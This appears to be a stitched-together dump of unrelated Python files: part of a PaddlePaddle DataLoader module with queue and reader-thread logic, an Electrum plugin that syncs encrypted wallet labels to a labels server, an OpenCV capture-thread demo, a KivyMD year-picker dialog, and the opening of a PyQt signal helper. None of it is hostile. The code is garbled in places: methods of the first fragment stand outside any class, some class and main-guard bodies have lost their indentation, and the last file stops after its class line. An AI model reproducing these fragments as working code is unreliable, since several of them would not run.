    self._blocking_queue = None
    # NOTE: 1. In multiprocess mode, this thread is used to get next batch data from
    # self._data_queue, then push it into self._blocking_queue; 2. In singleprocess
    # mode, this thread is used to get next batch data from self._batch_reader, then
    # push it into self._blocking_queue
    self._thread = None
    self._pin_memory = True if use_pinned_memory(
    ) is None else use_pinned_memory()
@property
def queue(self):
    """The underlying C++ LoDTensorBlockingQueue buffering batches for the reader."""
    return self._blocking_queue
@property
def iterable(self):
    """Always True — this loader only supports iterable mode (see __init__)."""
    return self._iterable
def _clear_and_remove_data_queue(self):
    """Drain the worker data queue and drop it from the global cleanup set."""
    if self._data_queue is None:
        return
    # Drain leftover items so the queue's feeder thread can exit cleanly.
    while True:
        try:
            self._data_queue.get_nowait()
        except queue.Empty:
            break
    global multiprocess_queue_set
    multiprocess_queue_set.remove(self._data_queue)
def _wait_thread_ends(self):
    """Close the blocking queue (unblocking the reader thread) and join it."""
    reader_thread = self._thread
    if reader_thread is None:
        return
    self._blocking_queue.close()
    reader_thread.join()
def _wait_process_ends(self):
    """Join the worker process, if any, then unregister its pid."""
    worker = self._process
    if worker is None:
        return
    worker.join()
    # erase process id
    core._erase_process_pids(id(self))
def _init_iterable(self):
    """(Re)build the blocking queue and C++ py_reader before a new epoch."""
    # Make sure the previous epoch's thread/process have fully stopped first.
    self._wait_thread_ends()
    if self._use_multiprocess:
        self._wait_process_ends()
    # Dygraph feeds untyped var lists, so no per-variable feed metadata is needed.
    self._var_names = []
    self._shapes = []
    self._dtypes = []
    self._need_check_feed = []
    self._blocking_queue = core.init_lod_tensor_blocking_queue(
        core.Variable(), self._capacity, False)
    self._reader = None
    self._reader = core.create_py_reader(
        self.queue, self._var_names, self._shapes, self._dtypes,
        self._need_check_feed, self._places, self._use_double_buffer, True,
        self._pin_memory)
def _start(self):
    """Launch the feeding pipeline: optional worker process plus a reader thread."""
    if self._use_multiprocess:
        # clear old _data_queue and remove it from multiprocess_queue_set
        self._clear_and_remove_data_queue()
        # set data_queue and process
        self._data_queue = multiprocessing.Queue(self._capacity)
        # add _data_queue into global queue set
        global multiprocess_queue_set
        multiprocess_queue_set.add(self._data_queue)
        self._process = multiprocessing.Process(
            target=_reader_process_loop,
            args=(self._batch_reader, self._data_queue))
        self._process.daemon = True
        self._process.start()
        # Set child process signal handler
        # NOTE: [ avoiding hang ] 1. if the child process dies due to bus error/segfault
        # or just hang, the main process will hang waiting for data, so here need to deal
        # with SIGSEGV and SIGBUS of child process; 2. if the main process end before child
        # process, it shuts the all its daemonic children down with a SIGTERM (instead of
        # joining them without a timeout), so here need to deal with SIGTERM.
        core._set_process_pids(id(self), [self._process.pid])
        _set_SIGCHLD_handler()
        # Set reader_thread
        self._thread_done_event = threading.Event()
        self._thread = threading.Thread(
            target=self._reader_thread_loop_for_multiprocess,
            args=(_current_expected_place(), ))
        self._thread.daemon = True
        self._thread.start()
    else:
        # Single-process mode: the thread reads directly from the batch reader.
        self._thread = threading.Thread(
            target=self._reader_thread_loop_for_singleprocess,
            args=(_current_expected_place(), ))
        self._thread.daemon = True
        self._thread.start()
def _reset(self):
    """Reset the C++ reader and wait for background workers to finish."""
    self._reader.reset()
    self._wait_thread_ends()
    if self._use_multiprocess:
        self._wait_process_ends()
def __iter__(self):
    """Start a new epoch (rebuild queue/reader, launch workers) and return self."""
    assert self.iterable, "DataLoader is not iterable"
    assert self._batch_reader is not None, \
        "Data source of DataLoader has not set yet"
    self._init_iterable()
    self._start()
    return self
def __next__(self):
    """Return the next batch as a list of variables; reset and re-raise on exhaustion."""
    try:
        return self._reader.read_next_var_list()
    except StopIteration:
        # Clean up the worker thread/process, then propagate StopIteration.
        self._reset()
        six.reraise(*sys.exc_info())
def _exit_thread_expectedly(self):
    """Signal a normal reader-thread shutdown: mark done and close the queue."""
    self._thread_done_event.set()
    self._blocking_queue.close()
def _exit_thread_unexpectedly(self):
    """Signal an abnormal shutdown: mark done, kill the queue, and log the failure."""
    self._thread_done_event.set()
    # kill() (vs close()) aborts pending consumers instead of draining them.
    self._blocking_queue.kill()
    logging.error("DataLoader reader thread raised an exception!")
def _reader_thread_loop_for_multiprocess(self, legacy_expected_place):
    """Consumer-side thread loop (multiprocess mode): move tensor lists
    from the worker's multiprocessing queue into the C++ blocking queue
    until the done event is set or a None item arrives (treated as the
    expected end of data)."""
    # See _DataLoaderIterSingleProcess._thread_loop() for why set expected place here.
    _set_expected_place(legacy_expected_place)
    while not self._thread_done_event.is_set():
        try:
            # NOTE: [ avoid hanging ] Even with carefully designed data dependencies
            # (i.e., a put() always corresponding to a get()), hanging on get() can
            # still happen when data in queue is corrupted (e.g., due to
            # Queue.cancel_join_thread or unexpected exit). So we set a timeout whenever
            # we try to get data from `data_queue`
            # NOTE: [ avoid failed quickly ] Here, the time setting of QUEUE_GET_TIMEOUT
            # is relatively long, currently it is 60 seconds, because in some models,
            # if the reader child process starts with a heavy burden, the child process
            # has no enough time to put the data in the queue when the main process
            # start trying to get data from queue. At this time, the child thread needs
            # to wait slightly longer
            tensor_list = self._data_queue.get(timeout=QUEUE_GET_TIMEOUT)
        except:
            # NOTE [ avoid handing ] After adding the shared memory mechanism, not only
            # the queue.Empty exception will occur here, but other exceptions will also
            # occur, such as mmap failure. If it is not handled here, it will hang.
            # (Deliberately a bare except for that reason; the exception is re-raised.)
            self._exit_thread_unexpectedly()
            logging.error(
                "DataLoader reader thread failed to read data from the multiprocessing.Queue."
            )
            six.reraise(*sys.exc_info())
        if not self._thread_done_event.is_set():
            if tensor_list is not None:
                try:
                    array = core.LoDTensorArray()
                    for tensor in tensor_list:
                        array.append(tensor)
                    # push() returning False indicates the queue was closed
                    # on the consumer side; propagate the close.
                    if not self._blocking_queue.push(array):
                        self._blocking_queue.close()
                except:
                    self._exit_thread_unexpectedly()
                    six.reraise(*sys.exc_info())
            else:
                # A None item signals end of data: exit the loop cleanly.
                self._exit_thread_expectedly()
def _reader_thread_loop_for_singleprocess(self, legacy_expected_place):
    """Producer-side thread loop (single-process mode): run the Python
    batch reader and push each batch into the blocking queue as a
    LoDTensorArray; on any reader error, kill the queue so the consumer
    fails fast, then re-raise."""
    try:
        # See _DataLoaderIterSingleProcess._thread_loop() for why set expected place here.
        _set_expected_place(legacy_expected_place)
        for sample in self._batch_reader():
            array = core.LoDTensorArray()
            for item in sample:
                # Convert numpy-like items to LoDTensor on CPU before push.
                if not isinstance(item, core.LoDTensor):
                    item = self._check_input_array(item)
                    tmp = core.LoDTensor()
                    tmp.set(item, core.CPUPlace())
                    item = tmp
                array.append(item)
            # push() returns False when the queue was closed by the consumer.
            if not self._blocking_queue.push(array):
                break
        self._blocking_queue.close()
        self._thread = None
    except Exception:
        self._blocking_queue.kill()
        self._thread = None
        logging.warning(
            "DygraphDataLoader reader thread raised an exception.")
        six.reraise(*sys.exc_info())
def set_sample_generator(self,
                         reader,
                         batch_size,
                         drop_last=True,
                         places=None):
    """Feed this loader from a per-sample generator by batching it first.

    Returns self for chaining.
    """
    assert batch_size > 0, "batch_size must be larger than 0"
    normalize = (_get_paddle_place_list
                 if isinstance(places, (list, tuple)) else _get_paddle_place)
    batched = paddle.batch(reader, batch_size=batch_size, drop_last=drop_last)
    return self.set_sample_list_generator(batched, places=normalize(places))
def set_sample_list_generator(self, reader, places=None):
    """Feed this loader from a generator that yields lists of samples.

    Each yielded batch (a list of per-sample field tuples) is transposed
    here into one slot (column) per field before being handed to
    set_batch_generator. Returns self for chaining.
    """
    if isinstance(places, (list, tuple)):
        places = _get_paddle_place_list(places)
    else:
        places = _get_paddle_place(places)

    def _slot_batches():
        for batch in reader():
            slots = []
            for sample in batch:
                for idx, field in enumerate(sample):
                    # Grow the slot list lazily on the first (or a longer)
                    # sample; afterwards append into the existing column.
                    if idx >= len(slots):
                        slots.append([field])
                    else:
                        slots[idx].append(field)
            yield slots

    self.set_batch_generator(_slot_batches, places)
    return self
def set_batch_generator(self, reader, places=None):
    """Feed this loader from an already-batched generator.

    Falls back to the current expected place when none is given; dygraph
    mode supports exactly one place. Returns self for chaining.
    """
    places = (_get_paddle_place_list(places)
              if isinstance(places, (list, tuple))
              else _get_paddle_place(places))
    self._batch_reader = reader
    if places is None:
        places = _current_expected_place()
    self._places = _convert_places(places)
    assert len(self._places) == 1, "Number of places must be 1 in imperative mode"
    return self
class GeneratorLoader(DataLoaderBase):
    """Static-graph data loader fed by a user-supplied Python generator.

    Data is pushed from a background Python thread into a C++ LoD-tensor
    blocking queue. In iterable mode the loader is driven by Python
    iteration (__iter__/__next__); in non-iterable mode 'create_py_reader'
    and 'read' ops are inserted into the program and the user drives it
    with start()/reset().
    """

    def __init__(self,
                 feed_list=None,
                 capacity=None,
                 use_double_buffer=True,
                 iterable=True,
                 return_list=False,
                 drop_last=True):
        self._tensor_reader = None
        self._places = None
        self._thread = None
        self._queue = None
        self._feed_list = feed_list
        # _exited lets the feeding thread bail out while waiting for the
        # queue to be initialized (see __thread_main__ in _start).
        self._exited = False
        self._drop_last = drop_last
        self._keep_order = keep_data_loader_order()
        if not capacity:
            raise ValueError("Please give value to capacity.")
        self._iterable = iterable
        self._return_list = return_list
        if not self._feed_list:
            raise Exception("Feed list must be given under static mode.")
        self._use_double_buffer = use_double_buffer
        self._capacity = capacity
        if not self._iterable:
            self._init_non_iterable()

    def _wait_thread_ends(self):
        # Get self._thread first to prevent data race, because __thread_main__
        # would set self._thread be None at the end
        thread = self._thread
        if thread is not None and self._iterable:
            self._queue.close()
            thread.join()

    def _init_iterable(self):
        """(Re)create the blocking queue and the C++ py_reader for one pass
        of iteration; called at the start of every __iter__."""
        self._wait_thread_ends()
        self._var_names = [v.name for v in self._feed_list]
        self._shapes = [v.shape for v in self._feed_list]
        self._dtypes = [v.dtype for v in self._feed_list]
        self._need_check_feed = [
            v.desc.need_check_feed() for v in self._feed_list
        ]
        self._queue = core.init_lod_tensor_blocking_queue(
            core.Variable(), self._capacity, self._keep_order)
        self._reader = None
        self._reader = core.create_py_reader(
            self.queue, self._var_names, self._shapes, self._dtypes,
            self._need_check_feed, self._places, self._use_double_buffer,
            self._drop_last, False)

    def _init_non_iterable(self):
        """Insert 'create_py_reader' and 'read' ops into the program so an
        Executor.run() pulls batches from the blocking queue directly."""
        lod_levels = []
        dtypes = []
        shape_concat = []
        ranks = []
        shapes = []
        need_check_feed = []
        for feed_data in self._feed_list:
            dtypes.append(feed_data.dtype)
            shape_concat.extend(feed_data.shape)
            ranks.append(len(feed_data.shape))
            shapes.append(feed_data.shape)
            lod_levels.append(feed_data.lod_level)
            need_check_feed.append(int(feed_data.desc.need_check_feed()))
        queue_name = data_loader_unique_name_generator(
            'lod_tensor_blocking_queue')
        reader_name = data_loader_unique_name_generator('create_py_reader')
        double_buffer_name = data_loader_unique_name_generator('double_buffer')
        var = global_scope().var(queue_name)
        self._queue = core.init_lod_tensor_blocking_queue(var, self._capacity,
                                                          self._keep_order)
        # keep_order decides which program block hosts the reader var.
        if self._keep_order:
            block = default_main_program().current_block()
        else:
            block = default_startup_program().current_block()
        reader_var = block.create_var(name=reader_name)
        dtype_int = [int(t) for t in dtypes]
        block.append_op(
            type='create_py_reader',
            inputs={'blocking_queue': [queue_name]},
            outputs={'Out': [reader_var]},
            attrs={
                'shape_concat': shape_concat,
                'lod_levels': lod_levels,
                'dtypes': dtype_int,
                'need_check_feed': need_check_feed,
                'ranks': ranks
            })
        reader_var.desc.set_dtypes(dtypes)
        reader_var.persistable = True
        reader_var.stop_gradient = True
        if self._keep_order:
            main_prog_var = reader_var
            reader = main_prog_var
            reader.reset = self._queue.reset
        else:
            main_prog_var = _copy_reader_var_(
                default_main_program().current_block(), reader_var)
            main_prog_var.stop_gradient = True
            main_prog_var.persistable = True
            reader = monkey_patch_reader_methods(main_prog_var)
        if self._use_double_buffer:
            double_buffer_reader = double_buffer(
                reader, name=double_buffer_name)
            # we return a double buffer reader. However, the reset method comes from
            # py_reader.
            double_buffer_reader.reset = reader.reset
            reader = double_buffer_reader
        self._reader = reader
        default_main_program().current_block().append_op(
            type='read',
            inputs={'Reader': [self._reader]},
            outputs={'Out': self._feed_list},
            attrs={'drop_last': self._drop_last})

    @property
    def queue(self):
        # The underlying LoD-tensor blocking queue.
        return self._queue

    @property
    def iterable(self):
        return self._iterable

    def __iter__(self):
        assert self.iterable, "DataLoader is not iterable"
        assert self._tensor_reader is not None, \
            "Data source of DataLoader has not set yet"
        self._init_iterable()
        self._start()
        return self

    def __next__(self):
        # Read the next batch; on exhaustion close the queue, reset, and
        # re-raise StopIteration.
        try:
            if self._return_list:
                data = self._reader.read_next_list()
                for i in range(len(data)):
                    data[i] = data[i]._move_to_list()
                return data
            else:
                return self._reader.read_next()
        except StopIteration:
            self._queue.close()
            self._reset()
            six.reraise(*sys.exc_info())

    def start(self):
        # Non-iterable mode only: begin feeding for a new epoch.
        assert not self._iterable, "start() cannot be called when DataLoader is iterable"
        self._start()

    def reset(self):
        # Non-iterable mode only: recover after core.EOFException.
        assert not self._iterable, "reset() cannot be called when DataLoader is iterable"
        self._reset()

    def _start(self):
        def __thread_main__(legacy_expected_place):
            """Feeding thread: convert each batch to LoDTensors and push it
            into the blocking queue until exhausted or the queue closes."""
            try:
                # See _DataLoaderIterSingleProcess._thread_loop() for why set expected place here.
                _set_expected_place(legacy_expected_place)
                # Wait (in 1s slices) for the C++ side to initialize the
                # queue; abort if the loader is being torn down meanwhile.
                while not self._queue.wait_for_inited(1):
                    if self._exited:
                        return
                for tensors in self._tensor_reader():
                    array = core.LoDTensorArray()
                    for item in tensors:
                        if not isinstance(item, core.LoDTensor):
                            item = self._check_input_array(item)
                            tmp = core.LoDTensor()
                            tmp.set(item, core.CPUPlace())
                            item = tmp
                        array.append(item)
                    if not self._queue.push(array):
                        break
                self._queue.close()
                self._thread = None
            except Exception as ex:
                self._queue.kill()
                self._thread = None
                logging.warning('Your reader has raised an exception!')
                six.reraise(*sys.exc_info())

        self._thread = threading.Thread(
            target=__thread_main__, args=(_current_expected_place(), ))
        self._thread.daemon = True
        self._thread.start()

    def _reset(self):
        # Close the queue and flag _exited so a feeding thread still waiting
        # on wait_for_inited() returns, then join it before resetting.
        self._queue.close()
        self._exited = True
        thread = self._thread
        if thread is not None:
            thread.join()
        self._exited = False
        self._reader.reset()

    def set_sample_generator(self,
                             reader,
                             batch_size,
                             drop_last=True,
                             places=None):
        """Feed from a per-sample generator. When any feed var has LoD the
        batching goes through the sample-list path; otherwise a faster
        BatchedTensorProvider is used."""
        assert batch_size > 0, "batch_size must be larger than 0"
        if isinstance(places, (list, tuple)):
            places = _get_paddle_place_list(places)
        else:
            places = _get_paddle_place(places)
        has_lod = False
        for f in self._feed_list:
            if f.lod_level != 0:
                has_lod = True
                break
        if has_lod:
            self.set_sample_list_generator(
                paddle.batch(
                    reader, batch_size=batch_size, drop_last=drop_last),
                places=places)
        else:
            reader = BatchedTensorProvider(
                feed_list=self._feed_list,
                place=core.CPUPlace(),
                batch_size=batch_size,
                generator=reader,
                drop_last=drop_last)
            self.set_batch_generator(reader, places=places)
        return self

    def set_sample_list_generator(self, reader, places=None):
        """Feed from a generator yielding lists of samples; a DataFeeder
        (built in a scratch program) converts each batch to slots."""
        if isinstance(places, (list, tuple)):
            places = _get_paddle_place_list(places)
        else:
            places = _get_paddle_place(places)
        with program_guard(Program(), Program()):
            feeder = DataFeeder(
                feed_list=self._feed_list, place=core.CPUPlace())
            paddle_reader = feeder.decorate_reader(reader, multi_devices=False)

        def __tensor_reader_impl__():
            for slots in paddle_reader():
                yield [slots[var.name] for var in self._feed_list]

        self.set_batch_generator(__tensor_reader_impl__, places)
        return self

    def set_batch_generator(self, reader, places=None):
        """Feed from an already-batched generator; places are required only
        in iterable mode."""
        if isinstance(places, (list, tuple)):
            places = _get_paddle_place_list(places)
        else:
            places = _get_paddle_place(places)
        self._tensor_reader = reader
        if self._iterable:
            assert places is not None, "Places cannot be None when DataLoader is iterable"
            self._places = _convert_places(places)
        else:
            if places is not None:
                logging.info(
                    'places would be ommited when DataLoader is not iterable')
        return self
class PyReader(DataLoaderBase):
    """
    Python-side data feeder.

    Data yielded by a user reader is pushed from a background Python thread
    into a queue and consumed automatically when ``Executor.run(...)`` is
    called.

    Args:
        feed_list (list(Variable)|tuple(Variable)): variables to feed,
            created by :code:`fluid.layers.data()`.
        capacity (int): capacity of the internal queue, in batches. Use a
            larger value for fast readers.
        use_double_buffer (bool): prefetch the next batch asynchronously;
            faster, at the cost of roughly one extra batch of memory.
        iterable (bool): if True, the reader is a Python iterable decoupled
            from the program and the user feeds its output into
            :code:`Executor.run(feed=...)`; if False, read operators are
            inserted into the program and the user drives epochs with
            :code:`start()` / :code:`reset()`, catching
            :code:`fluid.core.EOFException` at epoch end.
        return_list (bool): only valid when iterable=True. If True, each
            device yields a list(LoDTensor) (recommended in dygraph mode);
            otherwise a dict of fed-variable name -> LoDTensor (recommended
            in static graph mode).

    Returns:
        the created reader object.

    Return type:
        reader(Reader)
    """

    def __init__(self,
                 feed_list=None,
                 capacity=None,
                 use_double_buffer=True,
                 iterable=True,
                 return_list=False):
        # PyReader is a thin compatibility wrapper: every operation is
        # delegated to a DataLoader built from a generator.
        self._loader = DataLoader.from_generator(
            feed_list, capacity, use_double_buffer, iterable, return_list)

    @property
    def queue(self):
        """The blocking queue of the wrapped DataLoader."""
        return self._loader.queue

    @property
    def iterable(self):
        """Whether this reader can be iterated directly."""
        return self._loader.iterable

    def __iter__(self):
        return self._loader.__iter__()

    def __next__(self):
        return self._loader.__next__()

    def start(self):
        """
        Start the data feeding thread.

        Only callable when the reader is not iterable. Call once before each
        epoch, then catch :code:`fluid.core.EOFException` raised by
        :code:`Executor.run()` to detect the end of the epoch and call
        :code:`reset()`.
        """
        self._loader.start()

    def reset(self):
        """
        Reset the reader after :code:`fluid.core.EOFException` is raised.

        Only callable when the reader is not iterable.
        """
        self._loader.reset()

    def decorate_sample_generator(self,
                                  sample_generator,
                                  batch_size,
                                  drop_last=True,
                                  places=None):
        """
        Set a per-sample data source.

        Faster than ``decorate_sample_list_generator(paddle.batch(...))``
        when no input has LoD.

        Args:
            sample_generator (generator): yields list(numpy.ndarray)-typed
                data for one sample at a time.
            batch_size (int): batch size; must be larger than 0.
            drop_last (bool): drop the final batch when it is smaller than
                batch_size.
            places (None|list(CUDAPlace)|list(CPUPlace)): must be provided
                when the reader is iterable.
        """
        self._loader.set_sample_generator(sample_generator, batch_size,
                                          drop_last, places)

    def decorate_sample_list_generator(self, reader, places=None):
        """
        Set a batched data source.

        Args:
            reader (generator): yields list(numpy.ndarray)-typed batched
                data (e.g. the output of :code:`paddle.batch`).
            places (None|list(CUDAPlace)|list(CPUPlace)): must be provided
                when the reader is iterable.
        """
        self._loader.set_sample_list_generator(reader, places)

    def decorate_batch_generator(self, reader, places=None):
        """
        Set a batched data source.

        Args:
            reader (generator): yields numpy.ndarray-typed or
                LoDTensor-typed batched data.
            places (None|list(CUDAPlace)|list(CPUPlace)): must be provided
                when the reader is iterable.
        """
        self._loader.set_batch_generator(reader, places)
class DatasetLoader(DataLoaderBase):
    """Loader backed by a fleet Dataset; static-graph mode only.

    Thread and queue counts are forced to match the number of places, and
    iteration is delegated to a C++ IterableDatasetWrapper.
    """

    def __init__(self, dataset, places, drop_last):
        assert isinstance(dataset, paddle.distributed.fleet.dataset.
                          DatasetBase), "dataset must be type of DatasetBase"
        assert not in_dygraph_mode(
        ), "DatasetLoader is not supported in dygraph mode yet"
        if isinstance(places, (list, tuple)):
            places = _get_paddle_place_list(places)
        else:
            places = _get_paddle_place(places)
        # One worker thread per place; the dataset must have at least as
        # many files as threads.
        thread_num = len(places)
        assert len(dataset.filelist) >= thread_num, \
            "Filelist number of dataset {} must be not less than place number {}".format(len(dataset.filelist), thread_num)
        if dataset.thread_num != 0 and dataset.thread_num != thread_num:
            logging.warn('thread_num {} which is set in Dataset is ignored'.
                         format(dataset.thread_num))
        dataset._set_thread(thread_num)
        # In-memory datasets cannot use more queues than threads.
        if isinstance(dataset, paddle.distributed.fleet.dataset.
                      InMemoryDataset) and dataset.queue_num > thread_num:
            logging.warn("queue_num {} which is set in Dataset is ignored".
                         format(dataset.queue_num))
            dataset._set_queue_num(thread_num)
        self._dataset = dataset
        use_slots = [
            slot.name for slot in dataset.proto_desc.multi_slot_desc.slots
            if slot.is_used
        ]
        self._iterable_dataset = core.IterableDatasetWrapper(
            dataset.dataset, use_slots,
            _convert_places(places), dataset.proto_desc.batch_size, drop_last)

    def __iter__(self):
        # Restart the dataset pipeline for a fresh pass.
        self._dataset._finish_to_run()
        self._dataset._prepare_to_run()
        self._iterable_dataset._start()
        return self

    def __next__(self):
        return self._iterable_dataset._next()
|
labels.py | import hashlib
import requests
import threading
import json
import sys
import traceback
import base64
from electrum_civx.plugin import BasePlugin, hook
from electrum_civx.crypto import aes_encrypt_with_iv, aes_decrypt_with_iv
from electrum_civx.i18n import _
class LabelsPlugin(BasePlugin):
    """Synchronize wallet labels with the central Electrum labels server.

    Labels and their keys are AES-encrypted client-side with a key derived
    from the wallet fingerprint, so the server never sees plaintext. A
    per-wallet monotonically increasing nonce orders the updates.
    """

    def __init__(self, parent, config, name):
        BasePlugin.__init__(self, parent, config, name)
        self.target_host = 'labels.electrum.org'
        # wallet -> (password, iv, wallet_id); populated by start_wallet().
        self.wallets = {}

    def encode(self, wallet, msg):
        """Encrypt *msg* with the wallet's key/iv; return base64 text."""
        password, iv, wallet_id = self.wallets[wallet]
        encrypted = aes_encrypt_with_iv(password, iv,
                                        msg.encode('utf8'))
        return base64.b64encode(encrypted).decode()

    def decode(self, wallet, message):
        """Decrypt a base64-encoded *message* with the wallet's key/iv."""
        password, iv, wallet_id = self.wallets[wallet]
        decoded = base64.b64decode(message)
        decrypted = aes_decrypt_with_iv(password, iv, decoded)
        return decrypted.decode('utf8')

    def get_nonce(self, wallet):
        # nonce is the nonce to be used with the next change
        nonce = wallet.storage.get('wallet_nonce')
        if nonce is None:
            nonce = 1
            self.set_nonce(wallet, nonce)
        return nonce

    def set_nonce(self, wallet, nonce):
        """Persist the wallet's next-change nonce."""
        self.print_error("set", wallet.basename(), "nonce to", nonce)
        wallet.storage.put("wallet_nonce", nonce)

    @hook
    def set_label(self, wallet, item, label):
        """Hook: push one changed label to the server in the background."""
        if wallet not in self.wallets:
            return
        if not item:
            return
        nonce = self.get_nonce(wallet)
        wallet_id = self.wallets[wallet][2]
        bundle = {"walletId": wallet_id,
                  "walletNonce": nonce,
                  "externalId": self.encode(wallet, item),
                  "encryptedLabel": self.encode(wallet, label)}
        t = threading.Thread(target=self.do_request_safe,
                             args=["POST", "/label", False, bundle])
        # Thread.setDaemon() is deprecated; set the attribute directly.
        t.daemon = True
        t.start()
        # Caller will write the wallet
        self.set_nonce(wallet, nonce + 1)

    def do_request(self, method, url="/labels", is_batch=False, data=None):
        """Perform an HTTPS request against the labels server.

        Raises on non-200 responses and on an "error" key in the JSON
        payload; otherwise returns the decoded JSON response.
        """
        url = 'https://' + self.target_host + url
        kwargs = {'headers': {}}
        if method == 'GET' and data:
            kwargs['params'] = data
        elif method == 'POST' and data:
            kwargs['data'] = json.dumps(data)
            kwargs['headers']['Content-Type'] = 'application/json'
        response = requests.request(method, url, **kwargs)
        if response.status_code != 200:
            raise Exception(response.status_code, response.text)
        response = response.json()
        if "error" in response:
            raise Exception(response["error"])
        return response

    def do_request_safe(self, *args, **kwargs):
        """Best-effort request wrapper for background threads: never raises."""
        try:
            self.do_request(*args, **kwargs)
        except BaseException as e:
            # traceback.print_exc(file=sys.stderr)
            # Log the failure reason instead of silently discarding it.
            self.print_error('error doing request:', repr(e))

    def push_thread(self, wallet):
        """Upload every label of *wallet* to the server in one batch."""
        wallet_data = self.wallets.get(wallet, None)
        if not wallet_data:
            raise Exception('Wallet {} not loaded'.format(wallet))
        wallet_id = wallet_data[2]
        bundle = {"labels": [],
                  "walletId": wallet_id,
                  "walletNonce": self.get_nonce(wallet)}
        for key, value in wallet.labels.items():
            try:
                encoded_key = self.encode(wallet, key)
                encoded_value = self.encode(wallet, value)
            except Exception:
                self.print_error('cannot encode', repr(key), repr(value))
                continue
            bundle["labels"].append({'encryptedLabel': encoded_value,
                                     'externalId': encoded_key})
        self.do_request("POST", "/labels", True, bundle)

    def pull_thread(self, wallet, force):
        """Fetch labels newer than our nonce (all labels when *force*)."""
        wallet_data = self.wallets.get(wallet, None)
        if not wallet_data:
            raise Exception('Wallet {} not loaded'.format(wallet))
        wallet_id = wallet_data[2]
        nonce = 1 if force else self.get_nonce(wallet) - 1
        self.print_error("asking for labels since nonce", nonce)
        response = self.do_request("GET", ("/labels/since/%d/for/%s" % (nonce, wallet_id)))
        if response["labels"] is None:
            self.print_error('no new labels')
            return
        result = {}
        for label in response["labels"]:
            try:
                key = self.decode(wallet, label["externalId"])
                value = self.decode(wallet, label["encryptedLabel"])
            except Exception:
                # Skip entries we cannot decrypt (e.g. foreign wallet id).
                continue
            try:
                json.dumps(key)
                json.dumps(value)
            except Exception:
                self.print_error('error: no json', key)
                continue
            result[key] = value
        for key, value in result.items():
            if force or not wallet.labels.get(key):
                wallet.labels[key] = value
        # Count the labels actually received, not the response dict's keys.
        self.print_error("received %d labels" % len(response["labels"]))
        # do not write to disk because we're in a daemon thread
        wallet.storage.put('labels', wallet.labels)
        self.set_nonce(wallet, response["nonce"] + 1)
        self.on_pulled(wallet)

    def pull_thread_safe(self, wallet, force):
        """Best-effort pull wrapper for background threads: never raises."""
        try:
            self.pull_thread(wallet, force)
        except BaseException as e:
            # traceback.print_exc(file=sys.stderr)
            self.print_error('could not retrieve labels:', repr(e))

    def start_wallet(self, wallet):
        """Derive the wallet's encryption material and start a first pull."""
        nonce = self.get_nonce(wallet)
        self.print_error("wallet", wallet.basename(), "nonce is", nonce)
        mpk = wallet.get_fingerprint()
        if not mpk:
            return
        mpk = mpk.encode('ascii')
        password = hashlib.sha1(mpk).hexdigest()[:32].encode('ascii')
        iv = hashlib.sha256(password).digest()[:16]
        wallet_id = hashlib.sha256(mpk).hexdigest()
        self.wallets[wallet] = (password, iv, wallet_id)
        # If there is an auth token we can try to actually start syncing
        t = threading.Thread(target=self.pull_thread_safe, args=(wallet, False))
        # Thread.setDaemon() is deprecated; set the attribute directly.
        t.daemon = True
        t.start()

    def stop_wallet(self, wallet):
        """Forget the wallet's encryption material."""
        self.wallets.pop(wallet, None)
|
thread.py | #!/usr/bin/env python
import cv2 as cv
from threading import Thread
import time
from umucv.util import putText
from umucv.stream import autoStream
def work(img):
    """Deliberately heavy workload: ten successive 17x17 median blurs."""
    result = img
    passes_left = 10
    while passes_left:
        result = cv.medianBlur(result, 17)
        passes_left -= 1
    return result
# Latest frame captured by the background thread; None until first capture.
frame = None
goon = True

def fun():
    """Capture loop (background thread): show each camera frame and publish
    it through the global `frame` for the processing loop below."""
    global frame, goon, key
    for key, frame in autoStream():
        cv.imshow('cam', frame)
    goon = False

t = Thread(target=fun, args=())
t.start()

# Wait for the first frame. Sleep between checks instead of busy-spinning
# (`while frame is None: pass` pins a full CPU core and starves the capture
# thread).
while frame is None:
    time.sleep(0.01)

while goon:
    t0 = time.time()
    result = work(frame)
    t1 = time.time()
    putText(result, '{:.0f}ms'.format(1000 * (t1 - t0)))
    cv.imshow('work', result)
YearDialog.py | from kivymd.uix.dialog import MDDialog
from kivymd.uix.button import MDFlatButton
from kivymd.uix.screen import MDScreen
from kivymd.uix.list import OneLineListItem
from kivymd.app import MDApp
from kivy.uix.recycleview import RecycleView
from kivy.lang import Builder
# NOTE(review): the kv rule references app.cal and app.yeardialog — confirm
# the running app actually provides these attributes.
kv = """
#:import Thread threading.Thread
<CustomRecycle>:
    id: crv
    key_viewclass: 'viewclass'
    key_size: "height"
    RecycleBoxLayout:
        id: rbl
        padding: "10dp"
        default_size: None, dp(48)
        default_size_hint: 1, None
        size_hint_y: None
        height: self.minimum_height
        orientation: "vertical"
<YearItem>:
    on_release:
        content = root.parent.parent.parent
        content.gyear = self.text.split('/')[0]
        # Pass the callable and its argument separately: calling
        # on_year_change(...) here would run it on the UI thread and hand
        # its return value to Thread as the target.
        thread = Thread(target=app.cal.on_year_change, args=(content.gyear,))
        thread.start()
        app.yeardialog.dismiss()
"""
class YearItem(OneLineListItem):
    # One row of the year list ("gregorian/islamic" text); its on_release
    # behaviour is defined in the kv rule above.
    pass
class YearContent(MDScreen):
    """Dialog content: a scrollable list of years 1990-2070, each shown with
    its corresponding Islamic year (gregorian - 579)."""

    def build(self):
        """Initialise screen state and load the kv rules."""
        self.name = "Year"
        self.year = None
        return Builder.load_string(kv)

    def create(self):
        """Build the screen and return a populated year list widget."""
        self.build()
        recycle = CustomRecycle()
        recycle.size_hint_y = None
        recycle.height = 300
        recycle.data = [
            {"viewclass": "YearItem", "text": f"{year}/{year - 579}"}
            for year in range(1990, 2071)
        ]
        return recycle
class CustomRecycle(RecycleView):
pass
class Example(MDApp):
    # Demo app: one button that opens the year-chooser dialog.
    def build(self):
        # Pre-build the dialog content (a populated year list widget).
        self.content = YearContent(size_hint_y=None, height=400).create()
        self.dialog = MDDialog(
            title="Choose Year:",
            type="custom",
            content_cls=self.content
        )
        screen = MDScreen()
        button = MDFlatButton(text="Click Me", on_release=self.open_dialog)
        screen.add_widget(button)
        return screen

    def open_dialog(self, instance):
        # Button callback: show the year-chooser dialog.
        self.dialog.open()
if __name__ == '__main__':
Example().run() |
QtExecuteSignal.py | ##############################################################################
# #
# Copyright (C) 2017, goatpig #
# Distributed under the MIT license #
# See LICENSE-MIT or https://opensource.org/licenses/MIT #
# #
##############################################################################
from PyQt4.QtCore import SIGNAL
from threading import Thread
from time import sleep
##############################################################################
class QtExecuteSignal(object):
